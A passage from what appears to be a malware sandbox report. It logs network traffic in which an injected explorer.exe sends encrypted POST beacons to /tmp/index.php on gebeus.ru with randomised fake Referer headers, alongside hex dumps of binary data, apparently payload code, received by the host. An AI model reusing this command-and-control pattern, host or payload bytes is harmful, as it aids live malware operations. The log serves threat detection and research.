                                              Jul 23, 2024 06:16:16.946358919 CEST1236INData Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00
                                              Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
                                              Jul 23, 2024 06:16:16.946392059 CEST1236INData Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94
                                              Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
                                              Jul 23, 2024 06:16:16.946937084 CEST1236INData Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe
                                              Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
                                              Jul 23, 2024 06:16:16.946966887 CEST108INData Raw: ff c1 44 89 8c 24 e4 01 00 00 be 1f c5 74 ff e9 d4 e7 ff ff 44 8b 4c 24 60 45 01 c9 44 89 8c 24 a8 01 00 00 be 14 af 62 29 e9 ba e7 ff ff 44 8b 4c 24 4c 49 01 c9 4c 89 8c 24 50 02 00 00 be cd ae cd 56 e9 a0 e7 ff ff be 30 c4 7f a1 e9 96 e7 ff ff
                                              Data Ascii: D$tDL$`ED$b)DL$LIL$PV0DL$DT$DD0ZNZN
                                              Jul 23, 2024 06:16:16.946997881 CEST1236INData Raw: fa 05 0f 85 66 e7 ff ff bf 1c 4e 37 72 e9 5c e7 ff ff 44 89 fb f7 d3 c1 eb 08 83 cb fe 41 89 d9 41 f7 d1 44 8b 94 24 a4 01 00 00 44 89 d6 f7 d6 09 f3 81 e6 ce 4c d8 7c 41 81 e2 31 b3 27 83 41 09 f2 41 81 c9 ce 4c d8 7c 45 31 d1 f7 d3 44 09 cb be
                                              Data Ascii: fN7r\DAAD$DL|A1'AAL|E1D@0t+AL$D$D$DL$|D$DL$xD$E@D$A@@0h`h`$$V2~$
                                              Jul 23, 2024 06:16:16.947031975 CEST1236INData Raw: fa 7b 75 05 bf d9 d2 1d c9 41 83 f9 0a 0f 4d f7 45 85 d2 0f 45 f7 e9 8d e2 ff ff 44 8b 8c 24 ac 00 00 00 44 89 4c 24 60 44 8b 8c 24 b4 00 00 00 44 89 4c 24 64 44 8b 4c 24 60 41 c1 e9 07 41 83 e1 02 44 89 8c 24 a4 01 00 00 44 8b 4c 24 60 41 f7 d1
                                              Data Ascii: {uAMEED$DL$`D$DL$dDL$`AAD$DL$`AAqNYAC];9$4D$D$0AD$"}DDAqAAAAD$AD$y,PDL$%D$:8$
                                              Jul 23, 2024 06:16:16.951071024 CEST1236INData Raw: 45 21 d1 44 89 8c 24 c8 01 00 00 be 2d ff 57 a4 e9 bf dd ff ff 44 8b 4c 24 2c 4c 8b 94 24 38 02 00 00 45 89 0a 44 8b 4c 24 34 44 8b 54 24 34 31 f6 41 39 d2 40 0f 93 c6 c1 e6 02 81 ce 33 ff ff ff 41 39 d1 41 b9 00 00 00 00 41 0f 44 f1 89 b4 24 f4
                                              Data Ascii: E!D$-WDL$,L$8EDL$4DT$41A9@3A9AAD$U&OuD$DL$PD$D$L$ EDL$D$EA]bgE+!D$,D$D$(D$PG$D$$t&


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.54972858.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:17.898041964 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mpvhivgiojy.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 128
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:17.898070097 CEST128OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 33 55 a2 91
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA ,[k,vu3U~gZpl?;w9Itt)mV<Vg
                                              Jul 23, 2024 06:16:20.169270039 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:19 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.54972958.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:20.181471109 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qkeywmaxpqyajg.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 329
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:20.181504011 CEST329OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7b 3d d7 94
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu{=D1[@tv`D~u-8,>[P]DnFW@],.m$KH%0sZTQT6;|KYIo|!V3*
                                              Jul 23, 2024 06:16:22.471963882 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:22 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.54973058.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:22.487385035 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://kyaejpplhrtmlm.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 361
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:22.487385988 CEST361OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3c 3e fd a2
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu<>{7`Q}Th`{0 o.YvK9J%U1P]Me30~p`/z=,msOj)FS8fed4RoHvVOj
                                              Jul 23, 2024 06:16:24.008851051 CEST206INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c
                                              Data Ascii: #\6U9H-anYp7vZW|


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.54973358.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:28.171829939 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ochmmwawdfhift.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 187
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:28.171859026 CEST187OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2c 15 ea 83
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu,XmIms!b4;kE71OyJI%5o%ZEpvK5>W.X.3
                                              Jul 23, 2024 06:16:30.248508930 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.54974958.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:17:37.382864952 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://bmrqxjpnnmfq.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 270
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:37.382864952 CEST270OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 1e c6 95
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vup"ia050B+pzXgh|JF=0vd$)/CMf713WUMHYx)^BrfIY]]XrN`'U]n
                                              Jul 23, 2024 06:17:38.906838894 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.54975058.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:17:43.760410070 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://vfkimedsiioubu.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 281
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:43.760458946 CEST281OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 58 db 86
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuwXKkZPw98~|]Y]D\U~RNC_$"o.kQWm;V"tJF<1tOd4N="yzr<;Gh
                                              Jul 23, 2024 06:17:45.280702114 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:44 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.54975158.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:17:49.311870098 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gsqdyhadbujwtt.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 212
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:49.311871052 CEST212OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 3a bb 80
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu::nWkz07f}gcRK~u5(T+YN{cq=|SF<5h_Di#A
                                              Jul 23, 2024 06:17:51.625567913 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:51 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.54975258.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:17:55.797616959 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gaccdlqnuttqyggb.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 334
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:55.797616959 CEST334OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 3f d4 8c
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu9?FVCXVwm({j1iB75SlmFIVI]?4?,2!1L"Q)A%|rG`?-e|a`c|DjaXC
                                              Jul 23, 2024 06:17:58.200817108 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.549753211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:04.859649897 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://hwyiclkccgwel.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 202
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:04.859673977 CEST202OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 27 fe ff
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu|'plLRk_I0\3vjg}45XA^YwQ`9Ql O,Qj'3aZx-Z
                                              Jul 23, 2024 06:18:06.304620981 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:06 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.549754211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:10.418839931 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ayjiiqvsdwkm.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 289
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:10.418840885 CEST289OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 03 d2 89
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu1}*Po~y$oM:epxKE|[\U/ZODLB\X/~ytW*X :[I2CO-:~c"4~gyz.^]l
                                              Jul 23, 2024 06:18:11.844388008 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:11 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.549755211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:15.984659910 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://sisxkrjxvfhbylwf.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 195
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:15.984709024 CEST195OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 1c dd 90
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu@tMrAd^6#r]^{o//HG&*[p<"<GI\b#+k'
                                              Jul 23, 2024 06:18:17.462402105 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:17 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.549756211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:21.934712887 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ejjtkyjcscj.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 317
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:21.934712887 CEST317OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 31 c6 89
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu\1~]uQ?Jr/6*0)~zg|>Z5@?LO(a}":@5?.\LD@HVO~ypqv\+[rW~QI
                                              Jul 23, 2024 06:18:23.369680882 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.549757211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:27.276273966 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://rkihnepnpjlak.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 296
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:27.276299000 CEST296OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 0a aa 99
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu=~@iLXUKw3>"BIS?i-/??7Ne\|Z}M(Rwn07V(34n
                                              Jul 23, 2024 06:18:28.737255096 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:28 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.549758211.202.224.10801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:18:32.931145906 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://yakfbjcglwus.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 321
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:18:32.931184053 CEST321OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 18 e9 f7
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuHz!^xKOe;k8d|IRVK7ZPHDevsMd!sb79&V k@kI]uXo6?'
                                              Jul 23, 2024 06:18:34.351037025 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:18:34 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
